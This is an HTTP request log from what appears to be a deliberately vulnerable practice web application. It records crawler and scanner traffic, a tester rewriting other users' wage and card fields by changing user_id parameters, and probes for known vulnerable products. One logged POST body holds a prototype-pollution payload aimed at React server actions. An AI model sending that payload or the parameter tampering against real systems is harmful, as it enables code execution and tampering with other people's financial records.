Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
===================
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43604
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
===================
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
[2026-03-18 17:42:13] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:57492
===================
Priority: u=0, i
Te: trailers
Pragma: no-cache
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-18 17:42:13] === HTTP Request ===
[2026-03-18 17:41:29] Salary page accessed - IP: 172.30.0.12:57492
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Mode: cors
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /salary
URL: /salary
Method: GET
[2026-03-18 17:41:29] === HTTP Request ===
[2026-03-18 17:41:28] Salary page accessed - IP: 172.30.0.12:57492
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: cors
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /salary
URL: /salary
Method: GET
[2026-03-18 17:41:28] === HTTP Request ===
===================
If-Modified-Since: Mon, 10 Nov 2025 15:08:02 GMT
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-18 17:41:25] === HTTP Request ===
[2026-03-18 17:41:25] Update Financial Info - user_id: 17, card_number: 123, card_holder: 123, expiry_date: 123, cvv: 123
===================
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: cors
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Method: GET
[2026-03-18 17:41:25] === HTTP Request ===
[2026-03-18 17:41:25] Salary page accessed - IP: 172.30.0.12:57492
===================
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
X-Forwarded-Host: admin.vulnberries.ru
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /salary
URL: /salary
Method: GET
[2026-03-18 17:41:25] === HTTP Request ===
[2026-03-18 17:39:52] Update Financial Info - user_id: 19, card_number: 123, card_holder: 123, expiry_date: 123, cvv: 123
===================
Te: trailers
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Priority: u=0
Accept: */*
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Method: GET
[2026-03-18 17:39:52] === HTTP Request ===
[2026-03-18 17:39:41] Update Financial Info - user_id: 19, card_number: 123, card_holder: 123, expiry_date: 123, cvv: 123
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Priority: u=0
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Method: GET
[2026-03-18 17:39:41] === HTTP Request ===
[2026-03-18 17:39:25] Update Financial Info - user_id: 17, card_number: 123, card_holder: 123, expiry_date: 123, cvv: 123
===================
Sec-Fetch-Dest: empty
Priority: u=0
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=123&card_holder=123&expiry_date=123&cvv=123
Method: GET
[2026-03-18 17:39:25] === HTTP Request ===
[2026-03-18 17:37:57] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773769096520973797; user_id=1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-18 17:37:57] === HTTP Request ===
[2026-03-18 17:37:56] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:57492
===================
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
Priority: u=4
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Te: trailers
Sec-Fetch-Mode: cors
Cookie: auth=sess_1773769096520973797; user_id=1
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-18 17:37:56] === HTTP Request ===
[2026-03-18 17:37:50] Login page accessed - IP: 172.30.0.12:57492
===================
Cookie: auth=sess_1773769096520973797; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /login
URL: /login
Method: GET
[2026-03-18 17:37:50] === HTTP Request ===
[2026-03-18 17:37:50] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:57492
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Priority: u=0, i
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Cookie: auth=sess_1773769096520973797; user_id=1
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-18 17:37:50] === HTTP Request ===
[2026-03-18 17:37:29] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Priority: u=0
Cookie: auth=sess_1773769096520973797; user_id=1
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-18 17:37:29] === HTTP Request ===
[2026-03-18 17:37:29] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1773769096520973797; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-18 17:37:29] === HTTP Request ===
[2026-03-18 17:37:20] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Priority: u=0
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Proto: https
Cookie: auth=sess_1773769096520973797; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-18 17:37:20] === HTTP Request ===
[2026-03-18 17:37:20] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773769096520973797; user_id=1
X-Forwarded-Proto: https
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-18 17:37:20] === HTTP Request ===
[2026-03-18 17:37:18] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:57492
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Te: trailers
Cookie: auth=sess_1773769096520973797; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Priority: u=4
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-18 17:37:18] === HTTP Request ===
[2026-03-18 17:37:18] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:57492
===================
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Cookie: auth=sess_1773769096520973797; user_id=1
X-Forwarded-Proto: https
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
X-Forwarded-For: 79.139.135.199
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-18 17:37:18] === HTTP Request ===
[2026-03-18 17:36:06] Salary page accessed - IP: 172.30.0.12:57492
===================
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.134
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /salary
URL: /salary
Method: HEAD
[2026-03-18 17:36:06] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.133
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57492
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-18 17:36:06] === HTTP Request ===
[2026-03-18 14:34:15] Main page accessed - IP: 35.241.150.107:46176
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.241.150.107:46176
Path: /
URL: /
Method: GET
[2026-03-18 14:34:15] === HTTP Request ===
[2026-03-18 14:26:11] Main page accessed - IP: 172.202.118.43:51648
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.202.118.43:51648
Path: /
URL: /
Method: GET
[2026-03-18 14:26:11] === HTTP Request ===
[2026-03-18 14:19:09] Main page accessed - IP: 87.236.176.202:58333
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.202:58333
Path: /
URL: /
Method: GET
[2026-03-18 14:19:09] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:45768
Path: /jars
URL: /jars
Method: GET
[2026-03-18 13:19:07] === HTTP Request ===
[2026-03-18 11:54:45] Main page accessed - IP: 35.195.241.97:59032
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.195.241.97:59032
Path: /
URL: /
Method: GET
[2026-03-18 11:54:45] === HTTP Request ===
[2026-03-18 11:06:09] Main page accessed - IP: 35.195.241.97:45982
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.195.241.97:45982
Path: /
URL: /
Method: GET
[2026-03-18 11:06:09] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.148.2:16748
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-18 10:28:51] === HTTP Request ===
[2026-03-18 10:26:27] Main page accessed - IP: 89.110.97.157:35068
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:35068
Path: /
URL: /
Method: GET
[2026-03-18 10:26:27] === HTTP Request ===
[2026-03-18 08:58:12] Main page accessed - IP: 159.89.88.188:47404
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.89.88.188:47404
Path: /
URL: /
Method: GET
[2026-03-18 08:58:12] === HTTP Request ===
[2026-03-18 07:57:07] Main page accessed - IP: 176.65.149.45:52038
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:52038
Path: /
URL: /
Method: GET
[2026-03-18 07:57:07] === HTTP Request ===
===================
X-Forwarded-For: 74.7.244.7
Via: 2.0 Caddy
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43172
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-18 07:17:54] === HTTP Request ===
[2026-03-18 06:09:11] Main page accessed - IP: 176.65.149.45:58776
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:58776
Path: /
URL: /
Method: GET
[2026-03-18 06:09:11] === HTTP Request ===
[2026-03-18 04:00:16] Main page accessed - IP: 205.210.31.80:49357
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept: */*
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.80:49357
Path: /
URL: /
Method: GET
[2026-03-18 04:00:16] === HTTP Request ===
[2026-03-18 03:48:38] Main page accessed - IP: 192.109.200.205:40086
===================
------B1773805718316179384--
"$@0"
Content-Disposition: form-data; name="1"
------B1773805718316179384
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------B1773805718316179384
Connection: close
Accept-Encoding: gzip
Next-Action: x
Content-Type: multipart/form-data; boundary=----B1773805718316179384
Content-Length: 358
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.109.200.205:40086
Path: /
URL: /
Method: POST
[2026-03-18 03:48:38] === HTTP Request ===
[2026-03-18 03:48:38] Main page accessed - IP: 192.109.200.205:40076
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.109.200.205:40076
Path: /
URL: /
Method: GET
[2026-03-18 03:48:38] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.113:46158
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-18 03:01:46] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.111:38278
Path: /webfig/
URL: /webfig/
Method: GET
[2026-03-18 03:01:36] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.113:50294
Query: type=rau
Path: /Telerik.Web.UI.WebResource.axd
URL: /Telerik.Web.UI.WebResource.axd?type=rau
Method: GET
[2026-03-18 03:01:26] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.113:50278
Path: /ext-js/app/common/zld_product_spec.js
URL: /ext-js/app/common/zld_product_spec.js
Method: GET
[2026-03-18 03:01:26] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.111:59556
Path: /api/session/properties
URL: /api/session/properties
Method: GET
[2026-03-18 03:01:13] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.112:53776
Path: /css/images/PTZOptics_powerby.png
URL: /css/images/PTZOptics_powerby.png
Method: GET
[2026-03-18 03:01:13] === HTTP Request ===
[2026-03-18 03:00:59] Login page accessed - IP: 45.156.129.111:56752
